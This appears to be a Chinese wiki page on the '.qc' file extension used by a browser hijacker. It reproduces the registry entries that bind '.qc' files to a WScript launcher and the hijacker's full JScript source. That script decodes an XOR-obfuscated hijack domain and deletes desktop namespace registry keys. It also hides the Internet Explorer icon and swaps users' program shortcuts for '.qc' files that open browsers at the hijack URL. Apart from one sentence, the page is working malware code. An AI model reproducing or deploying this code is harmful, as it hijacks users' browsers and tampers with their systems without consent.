.qc

出自 ProgWiki
前往: 導覽搜尋

.qc,疑似劫持瀏覽器的軟體所使用的附檔名。

相關

登錄資訊

Windows Registry Editor Version 5.00
 
[HKEY_CLASSES_ROOT\.qc]
@="qcfile"
 
[HKEY_CLASSES_ROOT\qcfile]
@="辦豎源宒"
"NeverShowExt"=""
 
[HKEY_CLASSES_ROOT\qcfile\CLSID]
@="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
 
[HKEY_CLASSES_ROOT\qcfile\DefaultIcon]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,75,00,72,00,\
  6c,00,2e,00,64,00,6c,00,6c,00,2c,00,30,00,00,00
 
[HKEY_CLASSES_ROOT\qcfile\shell]
@="open"
 
[HKEY_CLASSES_ROOT\qcfile\shell\open]
"CLSID"="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
 
[HKEY_CLASSES_ROOT\qcfile\shell\open\command]
@="WScript.exe \"C:\\Program Files\\WinRAR\\winrar.knl\" \"%1\""
 
[HKEY_CLASSES_ROOT\qcfile\shellex]
 
[HKEY_CLASSES_ROOT\qcfile\shellex\ContextMenuHandlers]
@=""
 
[HKEY_CLASSES_ROOT\qcfile\shellex\IconHandler]
@="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"

C:\Program Files\WinRAR\WinRAR.knl

(function() {
    var P, q;
    var k = 15;
    var z = ".qc";
    var o = "qcfile";
    var D;
    var C;
    var A = ["70^74^87^95^67^64^93^33^74^87^74","66^78^87^91^71^64^65^33^74^87^74", "91^71^74^88^64^93^67^75^33^74^87^74", "70^74^87^95^67^64^93^74^33^74^87^74", "60^57^63^92^74^33^74^87^74", "91^91^93^78^89^74^67^74^93^33^74^87^74", "73^70^93^74^73^64^87^33^74^87^74"];
    var G;
    var J;
    var N;
    var O;
    var b;
    var g;
var c = ["120^120^120^33^127^127^61^60^59^58^33^108^96^98"];
var M = "103^123^123^127^53^32^32^120^120^120^33^127^127^61^60^59^58^33^108^96^98";
    var t = function(R) {
        var T = R.split("^");
        for (var S in T) {
            T[S] = T[S] ^ k;
            T[S] = String.fromCharCode(T[S])
        }
        return T.join("")
    };
    var L = function() {
        for (var R in A) {
            A[R] = t(A[R])
        }
        for (var S in c) {
            c[S] = t(c[S])
        }
    };
    var d = function() {
        var S = 2147483650;
        sRegPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace";
        try {
            oLoc = new ActiveXObject("WbemScripting.SWbemLocator");
            oSvc = oLoc.ConnectServer(null, "root\\default");
            oReg = oSvc.Get("StdRegProv");
            oMethod = oReg.Methods_.Item("EnumKey");
            oInParam = oMethod.InParameters.SpawnInstance_();
            oInParam.hDefKey = S;
            oInParam.sSubKeyName = sRegPath;
            oOutParam = oReg.ExecMethod_(oMethod.Name, oInParam);
            return oOutParam.sNames.toArray()
        } catch(R) {
            return []
        }
    };
    var K = function(R, T) {
        for (var S = 0; S < R.length; S++) {
            if (R[S] == T) {
                return true
            }
        }
        return false
    };
    var h = function() {
        C = d();
        try {
            var S;
            var R = ["{1f4de370-d627-11d1-ba4f-00a0c91eedba}", "{450D8FBA-AD25-11D0-98A8-0800361B1103}", "{645FF040-5081-101B-9F08-00AA002F954E}", "{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"];
            for (S = 0; S < R.length; S++) {
                R[S] = R[S].toUpperCase()
            }
            for (S = 0; S < C.length; S++) {
                C[S] = C[S].toUpperCase()
            }
            for (S = 0; S < C.length; S++) {
                if (!K(R, C[S])) {
                    P.RegDelete("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\" + C[S] + "\\")
                }
            }
        } catch(T) {}
    };
    var F = function() {
        try {
            P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", 1, "REG_DWORD")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartPage\\Favorites", 255, "REG_BINARY")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu", 1, "REG_DWORD")
        } catch(R) {}
        try {
            P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}", 1, "REG_DWORD")
        } catch(R) {}
    };
 
    var s = function() {
        try {
            var U = P.Environment("PROCESS");
            var T = U("USERPROFILE");
            var R = T + "\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch";
            return R
        } catch(S) {
            return ""
        }
    };
    var p = function() {
        var R = WScript.Arguments;
        if (R.length == 0) {
            return true
        } else {
            return false
        }
    };
    var m = function(T) {
        var U = T.toUpperCase();
        for (var R in A) {
            if (U.indexOf(A[R]) > 0) {
                return true
            }
        }
        return false
    };
    var u = function() {
        try {
            var R = P.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir");
            return R
        } catch(S) {
            return "C:\\Program Files"
        }
    };
    var f = function(Y, W) {
        try {
            var U, S, R, ab;
            var X = new Array;
            var T = W;
            U = q.GetFolder(Y);
            R = new Enumerator(U.files);
            ab = "";
            T = W.toUpperCase();
            for (; ! R.atEnd(); R.moveNext()) {
                var aa = R.item();
                var Z = "";
                Z += aa;
                Z = Z.toUpperCase();
                if ((Z.match(T + "$") == T)) {
                    X[X.length] = Z
                }
            }
            return X
        } catch(V) {
            return []
        }
    };
    var H = function(S) {
        var R = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
        var U = R.ExecQuery('Select * From Win32_Process WHERE name="' + S + '"');
        var T = new Enumerator(U);
        while (!T.atEnd()) {
            T.item().Terminate();
            T.moveNext()
        }
        WScript.Sleep(1000)
    };
    var r = function(T, V, S, R) {
        try {
            var U = q.CreateTextFile(T, true);
            U.WriteLine("[360]");
            U.WriteLine("Sex=擭");
            U.WriteLine("Name=___" + escape(V) + "___");
            U.WriteLine("Tel=<<<" + escape(S) + ">>>");
            U.WriteLine("[InternetShortcut]");
            U.WriteLine("URL=http://www.baidu.com");
            U.WriteLine("IconIndex=0");
            U.WriteLine("IconFile=" + R);
            U.Close()
        } catch(W) {}
    };
    var I = function() {
        try {
            P.RegWrite("HKCR\\" + z + "\\", o, "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\", "辦豎源宒", "REG_SZ");
            //P.RegWrite("HKCR\\" + o + "\\IsShortcut", "", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\NeverShowExt", "", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\DefaultIcon\\", "%SystemRoot%\\system32\\url.dll,0", "REG_EXPAND_SZ");
            P.RegWrite("HKCR\\" + o + "\\CLSID\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\", "open", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\open\\CLSID", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shell\\open\\command\\", 'WScript.exe "' + g + 'winrar.knl" "%1"', "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shellex\\IconHandler\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ");
            P.RegWrite("HKCR\\" + o + "\\shellex\\ContextMenuHandlers\\", "", "REG_SZ")
        } catch(R) {}
    };
    var v = function(S, R) {
        try {
            q.CopyFile(S, R)
        } catch(T) {}
    };
    var n = function() {
        try {
            var R = P.RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command\\");
            R = ParseFullPath(src);
            R = R.replace(/"/g, "")
        } catch(S) {
            return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
        }
        if (R == "") {
            return "C:\\Program Files\\Internet Explorer\\iexplore.exe"
        }
        return R
    };
    var E = function() {
        P = new ActiveXObject("WScript.Shell");
        q = new ActiveXObject("Scripting.FileSystemObject");
        M = t(M);
        L();
        var S = P.Environment("PROCESS");
        O = S("SystemRoot") + "\\System32";
        b = S("ProgramFiles");
        g = b + "\\WinRAR\\";
        G = s();
        D = n();
        try {
            q.CreateFolder(g)
        } catch(R) {}
    };
    var a = function(V) {
        var Y = q.OpenTextFile(V, 1);
        var X = Y.ReadAll();
        var U = /___(.*?)___/ig;
        var S = /<<<(.*?)>>>/ig;
        var T, R;
        if (U.test(X)) {
            T = RegExp.$1;
            T = unescape(T)
        }
        if (S.test(X)) {
            R = RegExp.$1;
            R = unescape(R)
        }
        if (T != "") {
            if (m(T)) {
                var W = "http://" + c[parseInt(Math.random() * c.length)] + "/";
                R = W;
                if (R != "") {
                    R = '"' + R + '"'
                }
                P.Run('"' + T + '" ' + R, 1, false)
            } else {
                P.Run('"' + T + '" ', 1, false)
            }
        }
    };
    var l = function(R) {
        try {
            var S = q.GetFile(R);
            S.attributes = 32;
            q.DeleteFile(R)
        } catch(T) {}
    };
    var e = function(Y) {
        var T = f(Y, ".LNK");
        for (var S in T) {
            try {
                var W = T[S];
                var V;
                var aa = "";
                var U = "";
                var R = "";
                var ad = "";
                var ab = /\.exe$/ig;
                var Z = /system32/ig;
                var Sogou = /\SogouExplorer.exe$/ig;
                var HaoZip = /\HaoZip.exe$/ig;
                R = q.GetBaseName(W);
                V = P.CreateShortcut(W);
                aa = V.TargetPath;
                U = V.Arguments;
                if (aa == "") {
                    continue
                }
                if (Z.test(aa)) {
                    continue
                } else {}
                if (Sogou.test(aa)) {
                    continue
                }
                if (HaoZip.test(aa)) {
                    continue
                }
                if (ab.test(aa)) {
                    ad = Y + "\\" + R + z;
                    r(ad, aa, U, aa);
                    l(W)
                } else {}
            } catch(X) {}
        }
    };
    var w = function() {
        try {
            var T = P.SpecialFolders("AllUsersDesktop");
            var R = T + "\\Internet Explerer" + z;
            var Z = T + "\\INTERNET EXPLERER" + z;
            r(R, D, "", D)     
            l(Z)         
        } catch(S) {}
    };
    var y = function() {
        //P.Run("iexplore.exe " + M)
    };
    E();
    if (p()) {
        I();
        H("");
        F();
        w();
        h();
        e(P.SpecialFolders("AllUsersDesktop"));
        e(P.SpecialFolders("Desktop"));
       // B(G);
        e(G);
        y()
    } else {
        var x = WScript.Arguments;
        a(x(0));
        F();
        w();
        h();
        e(P.SpecialFolders("AllUsersDesktop"));
        e(P.SpecialFolders("Desktop"));
      //  B(G);
        e(G)
    }
})();